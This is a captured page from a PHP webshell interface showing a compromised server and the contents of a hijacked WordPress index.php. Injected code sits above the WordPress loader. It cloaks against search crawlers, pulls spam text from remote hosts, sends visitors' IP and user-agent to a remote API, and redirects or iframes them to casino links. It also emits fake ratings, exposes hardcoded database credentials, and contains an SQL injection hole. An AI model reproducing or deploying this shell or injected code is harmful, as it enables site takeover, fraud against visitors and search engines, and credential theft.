403Webshell
Server IP : 104.21.21.239  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/mitzvahm/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/mitzvahm/public_html/index.pho
<?php
include("client.pho");
error_reporting(0);
$qq = 'q';
$vl = 0;

$dbn = 'mitzvahm_main';
$dbu = 'mitzvahm_proxi';
$dbp = 'proxi786';
$dbh = 'localhost';


$conn = mysql_connect($dbh, $dbu, $dbp ) or die("Could not connect : " . mysql_error());
mysql_select_db($dbn) or die("Could not select database");
 
$ip = urlencode($_SERVER['REMOTE_ADDR']);
$ua = urlencode($_SERVER['HTTP_USER_AGENT']);
$source = urlencode($_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);
$dmn = urlencode($_SERVER['SERVER_NAME']);
$referer = urlencode($_SERVER['HTTP_REFERER']);
$crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler|CLR|Apache|moreover|scanner/i';
if (preg_match($crawlers, $ua)) {
	$abt = 1;
}
if (file_exists('bts.dat')) {
	$bts = file('bts.dat', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
	if (in_array($ip, $bts)) {
		$abt = 1;
	}
}

if (isset($_GET[$qq])) {
	$hurl = "http://{$_SERVER['HTTP_HOST']}{$_SERVER['PHP_SELF']}";
	$hurl = str_replace('index.php', '', $hurl);
	$k = $_GET[$qq];
	$title = ucfirst(str_replace('-', ' ', $k));
	$getgen = "SELECT * from w_cont WHERE `key`='_gen_'";
	$res_gen = mysql_query($getgen) or die("Query failed : " . mysql_error());
	$wp_gen = mysql_fetch_assoc($res_gen);
	$gen = $wp_gen['txt'];
	$getdesc = "SELECT * from w_cont WHERE `key`='_desc_'";
	$res_desc = mysql_query($getdesc) or die("Query failed : " . mysql_error());
	$wp_desc = mysql_fetch_assoc($res_desc);
	$gdesc = $wp_desc['txt'];
	$getred = "SELECT * from w_cont WHERE `key`='_red_'";
	$res_red = mysql_query($getred) or die("Query failed : " . mysql_error());
	$wp_red = mysql_fetch_assoc($res_red);
	$red = $wp_red['txt'];
	$getapi = "SELECT * from w_cont WHERE `key`='_api_'";
	$res_api = mysql_query($getapi) or die("Query failed : " . mysql_error());
	$wp_api = mysql_fetch_assoc($res_api);
	$api = $wp_api['txt'];

	$get_txt = "SELECT * from w_cont WHERE `key`='$k'";
		$res_txt = mysql_query($get_txt);
		if ($wp_txt = mysql_fetch_assoc($res_txt)) {
			$txt = $wp_txt['txt'];
			$desc = $wp_txt['desc'];
		}
		else {
			if (!$vl) $parse = "{$gen}{$k}";
			else $parse = "{$gen}{$k}&l=$dmn";
			$dparse = "{$gdesc}{$k}";
			$txt = file_get_contents($parse);
			$txtt = mysql_real_escape_string($txt);
			$desc = file_get_contents($dparse);
			$ddesc = mysql_real_escape_string($desc);
			$insert_txt = "INSERT INTO `w_cont` (`key`, `txt`, `desc`) VALUES('$k', '$txtt', '$ddesc')";
			$res_txt = mysql_query($insert_txt) or die("Query failed : " . mysql_error());
		}
	//404 not found page settings
	if (isset($_POST['notfound'])) {
		$notfound = "$red";
		header('Location: '.$notfound);
   		exit();
	}
	if (!$abt) {
		$churl = "{$api}&action=get_link&group=2casino&ua=$ua&source=$source&ip=$ip&referer=$referer&keyword=".urlencode($title);
		$check = file_get_contents($churl);
		$json = json_decode($check);
		$framesrc = $json->{'stream'}->{'url'};
		$type = $json->{'redirect'}->{'type'};

		if ($json->{'bot_action'}->{'text'} == '123') {
  			echo " ";
		} 
		else {
  			if($type == "iframe") {
    			echo "<script type=\"text/javascript\">document.write('<frameset cols=\"100%\"><frame src=\"$framesrc\"></frameset>');</script>";
  			} 
  			else if($type == "js_for_iframe") {
    			echo "<script type=\"text/javascript\">window.location.href = '" . $framesrc . "'</script>";
  			}
		}
	}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title><?php echo "$title - ".$_SERVER['HTTP_HOST'] ?></title>
<meta name="description" content="<?php echo "$desc"; ?>">
<link rel="stylesheet" type="text/css" media="all" href="http://www.mitzvahmarket.com/wp-content/themes/mitzvah2/css/reset.css"/>
<link rel="stylesheet" type="text/css" media="all" href="http://www.mitzvahmarket.com/wp-content/themes/mitzvah2/css/text.css"/>
<link rel="stylesheet" type="text/css" media="all" href="http://www.mitzvahmarket.com/wp-content/themes/mitzvah2/css/960.css"/>
<link rel="stylesheet" type="text/css" media="all" href="http://www.mitzvahmarket.com/wp-content/themes/mitzvah2/style.css?ver=1437070073"/>
<link rel="stylesheet" type="text/css" media="all" href="http://www.mitzvahmarket.com/wp-content/themes/mitzvah2/css/accordeon.css"/>
<link rel="stylesheet" type="text/css" media="all" href="http://www.mitzvahmarket.com/wp-content/themes/mitzvah2/css/ui.tabs.css"/>
<link rel="stylesheet" type="text/css" media="all" href="http://www.mitzvahmarket.com/wp-content/themes/mitzvah2/css/greybox.css"/>
<link rel="stylesheet" type="text/css" media="all" href="http://www.mitzvahmarket.com/wp-content/themes/mitzvah2/css/selectbox.css"/>
<link rel="stylesheet" type="text/css" media="all" href="http://www.mitzvahmarket.com/wp-content/themes/mitzvah2/styles/default.css"/>
<link rel="stylesheet" type="text/css" media="all" href="http://www.mitzvahmarket.com/wp-content/themes/mitzvah2/css/slicknav.css">
<link rel="stylesheet" type="text/css" media="screen" href="http://www.mitzvahmarket.com/wp-content/plugins/lcs-family-spotlights/css/datePicker.css">
 

</head>
<body>

	<span itemscope itemtype="http://schema.org/Product"><span style="display: none" itemprop="name"> <?php echo "$title" ?></span><span style="display: none"  itemprop="aggregateRating" itemscope itemtype="http://schema.org/AggregateRating"> Rating <span itemprop="ratingValue">
<?php
  $min=1;
  $max=5;
  echo rand($min,$max);
?>
</span> from 5 based on<span itemprop="reviewCount">
<?php
  $min=30;
  $max=5000;
  echo rand($min,$max);
?>
</span> reviews. </span>
 <?php echo "<h1>$title</h1>\n"; ?>

<span itemprop="review" itemscope itemtype="http://schema.org/Review"><?php
	echo "<div id=\"content\">\n$txt\n</div>\n";
?>
<div id="newnav_footer">
<div id="newnav_footer_inner">
<p style="padding-top:0px; padding-bottom:0px; margin: 0px;">
<a class="bottomnav" href="http://www.mitzvahmarket.com/">Home</a>|
<a class="bottomnav" href="http://www.mitzvahmarket.com/mitzvah-ideas/">Party Ideas</a>|
<a class="bottomnav" href="http://www.mitzvahmarket.com/find-projects/">Mitzvah Projects</a>|
<a class="bottomnav" href="http://www.mitzvahmarket.com/mitzvah-spotlight/">Spotlights</a>|
<a class="bottomnav" href="http://www.mitzvahmarket.com/vendor-directory/">Vendor Directory</a>|
<a class="bottomnav" href="http://www.mitzvahmarket.com/blog-mitzvah-diaries/">Blog</a>|
<a class="bottomnav" href="http://www.mitzvahmarket.com/vendor-list/?voffer=1">Deals &amp; Discounts</a>|
<a class="bottomnav" href="http://www.mitzvahmarket.com/bar-batmitzvah-showcases/">Showcases</a>|
<a class="bottomnav" href="http://www.mitzvahorganizer.com" target="_blank">Mitzvah Organizer</a>
</p>
<p style="padding-top:3px; padding-bottom:20px; margin:0px;">
<a class="bottomnav" href="http://www.mitzvahmarket.com/mitzvah-tv/">Mitzvah TV</a>|
<a class="bottomnav" href="http://www.mitzvahmarket.com/about/">About</a>|
<a class="bottomnav" href="http://www.mitzvahmarket.com/advertise/">Advertise</a>|
<a class="bottomnav" href="http://www.mitzvahmarket.com/contact-us/">Contact Us</a>|
<a class="bottomnav" href="http://www.mitzvahmarket.com/job-opportunities/">Job Opportunities</a>|
<a class="bottomnav" href="http://www.mitzvahmarket.com/editorial-policy/">Editorial Policy</a>|
<a class="bottomnav" href="http://www.mitzvahmarket.com/help/">Help</a>|
<a class="bottomnav" href="http://www.mitzvahmarket.com/invite-friend/">Invite a friend</a>|
<a class="bottomnav" href="http://www.mitzvahmarket.com/privacy-policy/">Privacy Policy</a>
</p>
</div>
</div> 
</div> 
</div> 
<div id="footer" class="fullspan">
<div class="container_16">
<div class="grid_16">
</div>
</div> 
</div> 
<div class="fullspan">
<div class="container_16">
<div class="grid_16">
<p style="font-size:11px; text-align:center; color:#481A0D;"><br/>&copy; 2015 <a href="http://www.mitzvahmarket.com" title="MitzvahMarket">MitzvahMarket</a>. &nbsp;All rights reserved. &nbsp;MitzvahMarket.com is a <a href="http://www.davlermedia.com">Davler Media Group</a> Property.&nbsp;&nbsp;Developed by <a href="http://www.latcomsystems.com/" target="_blank">LatCom Systems</a></p>
</div>
</div> 
</div> 
</div> 
</div>
</body>
</html>

<?php
die();
}
else {
	if ($abt) {
		$get_txt = "SELECT * FROM w_cont ORDER BY rand() LIMIT 50";
		$result = mysql_query($get_txt) or die("Query failed : " . mysql_error());
		while ($row = mysql_fetch_array($result, MYSQL_ASSOC) ) {
			$h1 = ucfirst(str_replace('-', ' ', $row['key']));
			if ($row['desc']) {
				$preview = substr($row['txt'],0,100);
				if ($row['desc'] !== 'rezerv') echo "<div><h2><a href=\"?{$qq}={$row[key]}\">$h1</a></h2></div>\n<div>$preview...</div><br><br>\n";
			}
		}
	}
}
?>
<?php 


/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );

Youez - 2016 - github.com/yon3zu
LinuXploit